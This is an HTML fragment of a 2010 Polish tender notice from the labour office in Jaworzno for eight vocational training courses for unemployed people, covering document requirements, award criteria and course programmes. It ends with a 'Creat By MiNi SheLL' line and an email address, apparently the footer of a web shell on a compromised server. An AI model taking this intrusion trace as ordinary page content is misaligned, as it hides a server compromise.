<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy wojewódzki urząd pracy. (zał. nr  11 do SIWZ)
Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Prawo zamówień publicznych - (załącznik nr 5 do SIWZ.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.7</li>
<li>2 - oświadczenie w prowadzeniu szkoleń - 0.2</li>
<li>3 - posiadanie certyfikatu jakości usług - 0.05</li>
<li>4 - zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 0.05</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących zajęcia na szkoleniu. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach.  Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio
lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przemiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem.
3)miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca przeprowadzenia szkolenia.
W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca szkolenia o co najmniej porównywalnych warunkach. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4)zmniejszenia maksymalnie o 2 osoby ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym dokonanie kolejnego naboru, niewystarczająca ilość osób zakwalifikowanych
do odbycia szkolenia itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupjaworzno.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd pracy w Jaworznie  ul. Północna 9b, 43-600 Jaworzno,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2010 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Powiatowego Urzędu Pracy w Jaworznie przy ulicy Północnej 9b, I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pracownik ochrony fizycznej I stopnia
Ilość osób:  6 w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Zakres Pracownik ochrony fizycznej I stopnia
Ilość osób:  6 w I edycji.
Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia: Szkolenie ma przygotować uczestników do egzaminu na uzyskanie licencji pracownika ochrony fizycznej I stopnia oraz do pracy w zawodzie pracownika ochrony. Powinno być zgodne z przepisami ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (tekst jednolity: Dz. U. z 2005r. Nr 145 poz. 1221               z późn. zm.) oraz przeprowadzone w oparciu o program opracowany na podstawie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 sierpnia 1998r. w sprawie rodzajów dyplomów i świadectw wydanych przez szkoły i inne placówki oświatowe, które potwierdzają uzyskanie specjalistycznych kwalifikacji  w zakresie ochrony osób i mienia, minimalnego zakresu programów kursów pracowników ochrony fizycznej pierwszego i drugiego stopnia oraz zakresu obowiązujących tematów egzaminów i trybu ich składania, składu komisji egzaminacyjnej i sposobu przeprowadzania egzaminu (Dz. U. Nr 113 poz. 731)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Operator koparko - ładowarki wszystkie typy klasa III
Ilość osób: 10 w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II.  Zakres Operator koparko - ładowarki wszystkie typy klasa III
Ilość osób: 10 w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin szkolenia - 202 godziny. Szkolenie powinno  być zorganizowane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych                   i drogowych (Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać świadectwo oraz uzyskać wpis do książki operatora wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie kierowców wykonujących przewóz drogowy - szkolenie w ramach kwalifikacji wstępnej przyśpieszonej w zakresie prawa jazdy kat. C lub kat. D
Ilość osób: 10 (zamawiający będzie kierował osoby bezrobotne na szkolenie indywidualnie lub grupowo w zależności od potrzeb)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III. Zakres  Szkolenie kierowców wykonujących przewóz drogowy - szkolenie w ramach kwalifikacji wstępnej przyśpieszonej w zakresie prawa jazdy kat. C lub kat. D
Ilość osób: 10 (zamawiający będzie kierował osoby bezrobotne na szkolenie indywidualnie lub grupowo w zależności od potrzeb). 
Czas realizacji: nie dłużej niż 4 tygodnie. 
Program szkolenia: Programy szkolenia winny być zgodne z obowiązującymi przepisami prawa                                tj. Ustawą z dnia 06 września 2001r. - o transporcie drogowym (tekst jednolity: Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 2 lipca 2008r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 124, poz. 805 z późn. zm.) 
Osoba skierowana na szkolenie może uzyskać jeden rodzaj kwalifikacji.
Dodatkowe wymagania: Uczestnik szkolenia otrzyma zaświadczenie zgodnie z ww. rozporządzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prawo jazdy kat. B 
Ilość osób:  12 (zamawiający będzie kierował osoby bezrobotne na szkolenie indywidualnie lub grupowo w zależności od potrzeb)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> IV. Zakres  Prawo jazdy kat. B 
Ilość osób:  12 (zamawiający będzie kierował  osoby bezrobotne na szkolenie indywidualnie lub grupowo w zależności od potrzeb).
w zależności od potrzeb).
Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia:  Program szkolenia musi być zgodny z obowiązującymi przepisami prawa tj. Ustawą              z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym (tekst jednolity: Dz. U. z 2005r. Nr 108 poz. 908 z późn. zm.) oraz  rozporządzeniem  Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami,  instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z późn. zm.).  Dodatkowe wymagania: Uczestnik szkolenia otrzyma zaświadczenie zgodnie z ww. rozporządzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sprzedawca
Ilość osób:  10  w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> V.  Zakres Sprzedawca
Ilość osób:  10  w I edycji.
Czas realizacji: nie dłużej niż 3 tygodnie 
Program szkolenia: minimalna ilość godzin - 120, w tym minimum 70 godzin ćwiczeń.
1. modułowy program szkolenia zawodowego dla zawodu: sprzedawca, z zakresu: pracownik działu sprzedaży (kod zawodu: 522107) z następującymi jednostkami modułowymi: 
1)przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej - minimum 3 godziny,
2)organizacja handlu w gospodarce rynkowej - minimum 14 godzin,
3)wyposażenie punktu sprzedaży detalicznej - minimum 10 godzin,
4)organizacja zaopatrzenia i przyjmowanie dostaw towarów - minimum 14 godzin,
5)wykonywanie i dokumentowanie podstawowych obliczeń sklepowych - minimum  18 godzin,
6)obsługiwanie klienta, przebieg sprzedaży detalicznej- minimum 12 godzin.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie  z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2. jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
3. jednostkę modułową: fakturowanie komputerowe- minimum 14 godzin,
4. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
5. jednostkę modułową: obsługa programu SUBIEKT dla WINDOWS do prowadzenia gospodarki magazynowej- 
    minimum 15 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Księgowość z zastosowaniem komputera
Ilość osób:  10 w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> VI.  Zakres Księgowość z zastosowaniem komputera
Ilość osób:  10 w I edycji.
Czas realizacji: nie dłużej niż 9 tygodni. 
Program szkolenia: minimalna ilość godzin - 270, w tym minimum 220 godzin ćwiczeń.
Program szkolenia musi zawierać:
1.modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy bilansista (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) ogólne zasady rachunkowości,
2) środki gospodarcze i źródła ich pochodzenia,
3) ewidencja operacji gospodarczych,
4) organizacja rachunkowości w jednostkach gospodarczych,
5) ogólne zasady inwentaryzacji,
6) ewidencja obrotu gotówkowego,
7) ewidencja obrotu bezgotówkowego,
8) ewidencja innych środków pieniężnych,
9) sporządzanie list płac i rozdzielników,
10)   sporządzanie list zasiłków i deklaracji ZUS
11)   rozliczanie podatku dochodowego od osób fizycznych,
12)   ewidencja rozrachunków z tytułu VAT,
13)   ewidencja rozrachunków z dostawcami,
14)   ewidencja rozrachunków z odbiorcami,
15)   ewidencja rozrachunków z pracownikami,
16)   ewidencja rozrachunków publiczno - prawnych,
17)   ewidencja pozostałych rozrachunków,
18)   ewidencja roszczeń,
19)   ewidencja roszczeń barterowych,
20)   ewidencja inwestycji,
21)   ewidencja środków trwałych,
22)   ewidencja finansowego majątku trwałego,
23)   ewidencja wartości niematerialnych i prawnych,
24)   ewidencja leasingu,
25)   ewidencja i rozliczanie zakupu towarów i opakowań,
26)   ewidencja zakupu usług,
27)   ewidencja i rozliczanie zakupu materiałów,
28)   ewidencja zużycia materiałów,
29)   rozliczenie kosztów handlowych,
30)   ewidencja i rozliczenie kosztów przedsiębiorstwa,
31)   kalkulacja kosztu jednostkowego produktu,
32)   ewidencja wyrobów gotowych,
33)   ewidencja sprzedaży towarów,
34)   ewidencja sprzedaży usług,
35)   ewidencja sprzedaży wyrobów gotowych,
36)   ustalenie wyniku finansowego,
37)   ewidencja wyniku finansowego,
38)   podział wyniku finansowego,
39)   ewidencja funduszy i kapitałów własnych,
40)   ewidencja funduszy specjalnych,
41)   sporządzanie sprawozdań,
42)   sporządzanie bilansu,
43)   sporządzanie sprawozdań z przepływu środków pieniężnych,
44)   sporządzanie rachunku zysków i strat,
45)   analiza podstawowych wskaźników finansowych,
46)   obsługa komputera w zakresie podstawowym,
47)   arkusze kalkulacyjne w zastosowaniach  finansowo- księgowych,
48)   obsługa programów płacowych,
49)   obsługa programów finansowo- księgowych
-- suma godzin dla jednostek modułowych 46,47,48,49 - minimum 50 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                             z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakres Pracownik administracyjno - biurowy
Ilość osób: 15 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> VII.  Zakres Pracownik administracyjno - biurowy
Ilość osób: 15 osób w I edycji.
Czas realizacji: nie dłużej niż 3 tygodnie. 
Program szkolenia:  minimalna ilość godzin- 120, w tym 70 godzin ćwiczeń.
Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu: pracownik administracyjny (kod zawodu: 343401) i pracownik biurowy (kod zawodu:419101) oraz musi zawierać następujące jednostki modułowe: 
1)organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy oraz ochrony  przeciwpożarowej i ochrony środowiska  i zarzadzanie w jednoste organizacyjnej,
2)organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz doskonalenie osobistych kompetencji,
3)organizowanie spotkań służbowych, z kontrahentami, pracownikami i klientami oraz innych prac związanych z funkcjonowaniem przedsiębiorstwa,
4)przyjmowanie i obsługiwanie interesantów,
5)wykonywanie prac admninistracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6)zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7)sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej z działalnością jednostki organizacyjnej zgodnie z przyjętym systemem kancelaryjnym,
8)przygotowanie i udostępnianie dokumentacji do kontroli,
9)redagowanie korespondencji biurowej w języku polskim,
10)sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz finansowej związanej z działalnością jednostki gospodarczej,
11)przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,
12)gromadzernie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika administracyjnego,
13)tworzenie i prowadzenie bazy danych kontrahentów,
14)stosowanie przepisów prawa w pracy zawodowej,
15)wykonywanie prac biurowych,
16)współpraca z innymi komórkami organizacyjnymi jednostki,
17)współpraca z otoczeniem zewnętrznym jednostki organizacyjnej ,
18)kierowanie zespołem pracowników administracyjno-biurowych,
19)ocenianie jakości i efektywności własnych działań zawodowych,
20)obsługa urządzeń biurowych,
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Manicure - pedicure, stylizacja paznokci
Ilość osób: 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> VIII.  Zakres Manicure - pedicure, stylizacja paznokci
Ilość osób: 5 osób w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia:  minimalna ilość godzin- 210, w tym 150 godzin zajęć praktycznych na stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych. 
Program szkolenia musi zawierać:
1.modułowy program szkolenia zawodowego dla zawodu: kosmetyczka (kod zawodu: 514103),
z następującymi jednostkami modułowymi:
1) pielęgnowanie dłoni, manicure, 
2) pielęgnowanie stóp, pedicure, 
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                             z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2.jednostkę modułową: stylizacja paznokci metodą żelową, 
3.jednostke modułową: stylizacja paznokci metodą akrylową, 
4.jednostkę modułową: zdobnictwo paznokci  (w tym nakładanie tipsów, malowanie paznokci) 
5.jednostkę modułową: nauka o kolorach i elementy stylizacji
6.jednostkę modułową: zakładanie i prowadzenie własnej działalnosci gospodarczej - minimum 10 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com